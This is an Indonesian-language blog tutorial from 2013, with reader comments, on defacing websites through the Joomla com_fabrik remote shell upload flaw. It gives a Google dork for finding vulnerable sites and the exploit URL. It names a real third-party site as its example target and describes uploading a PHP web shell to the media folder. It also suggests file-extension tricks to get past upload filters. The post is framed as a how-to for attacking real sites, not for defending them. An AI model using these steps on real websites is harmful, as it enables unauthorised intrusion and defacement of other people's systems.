Now Trending:

Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability

April 6, 2013 Tutorial Deface 34 Comments

Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.Oke, langsung saja.

Cara Deface dengan Metode Joomla Com_Fabrik Remote Shell Upload Vulnerability

Google Dork :

inurl:index.php?option=com_fabrik

Kreasikan sendiri dork kalian.

Exploit:

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi :

http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di www.target.com/media/shell.php

Selanjutnya bebas mau diapakan webnya haha.

Sebagai catatan saja, tidak semua web yang vuln epxloit ini bisa diupload shell backdoor. Kadang hanya support txt atau html saja. Tinggal kreasikan saja bypass ekstensi kalian misal diubah ke .phtml, .phpjpg, .phpfla, dll.

Oke sekian tutorial kali ini. Jika ada yang kurang jelas silahkan tinggalkan komentar.

Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

Tags:

34 Comments

  1. febriansyah haq April 6, 2013 Reply

    Nice info sobat

  2. Muro'i El-Barezy April 7, 2013 Reply

    mampir lagi silaturrahim sob

  3. Brebes VS Lamongan April 7, 2013 Reply

    mampir lagi mau membawahkan kopi hahaha

  4. Maz Imtikhan April 7, 2013 Reply

    menarik sob…

  5. BlogS of Hariyanto April 7, 2013 Reply

    hadir hadir belajar menyimak sobat 🙂

  6. Wahyu Dwi April 7, 2013 Reply

    xixixi kata katanya mantep 😀 pemalas gak akan sukses …

  7. Abed Saragih April 7, 2013 Reply

    Tipa hari ada saja ide-ide baru ya sob tiap kali saya kesini.Luar biasa ini kreatifitasnya 🙂

  8. Guru Pantura April 7, 2013 Reply

    Saya jujur kurang begitu mengerti masalah begini pak, masih bingung 🙁

    salam guru pantura.

  9. cik awi April 7, 2013 Reply

    Wah dahsyat ilmunya sob..

  10. Deby Putra Bahrodin April 7, 2013 Reply

    masih tetep pake injeksi ya.. Kalo di gabungin dengan virus gimana ya, mungkin aja trojan itu di gabungin sama sality terus di injeksi ke file nya …. Nyam nyam nyam

    • chiaki April 8, 2013 Reply

      Lebih suka gini. Cara klasik tp tetep banyak hasil. . . :v

  11. budi os 19 April 7, 2013 Reply

    Salud nih sama mas adminnya….
    Selalu ada ilmu dan bahan utk di post
    #laporan hadir ya sob… 🙂

  12. Rawins April 7, 2013 Reply

    ampuuun
    ga mudeng babar blas kalo yang beginian
    haha piss

  13. cak oni April 7, 2013 Reply

    mantef kang #JOSS

  14. babol only April 8, 2013 Reply

    saya g ngerti dengan yang beginian.. Haha.

  15. Masnady April 8, 2013 Reply

    waduh.. maaf sob baru sempat mampir nih. lagi sibuk di dunia nyata.. dan nyempet2in mampir di sini. hehehehe..

  16. PT cyberASK April 25, 2013 Reply

    ditunggu komennya ama visitnya
    di
    http://cyberask.blogspot.com

  17. Anonim May 14, 2013 Reply

    file csv tuh gimana min ?

  18. mifta khuddin May 16, 2013 Reply

    Aq kn berhasil upload shell nya. trz letaknya ada dimana y.?? koq di [site]/media/[shell.php ada .??

  19. Anonim May 20, 2013 Reply

    lagu di blognya judulnya apa y

  20. FANDY AHMD BAYHQQI June 30, 2013 Reply

    gue bego, jadi kagak tau

  21. Anonim July 9, 2013 Reply

    gimana caranya tau kalo kita udah berhasil upload shell??

Leave a Reply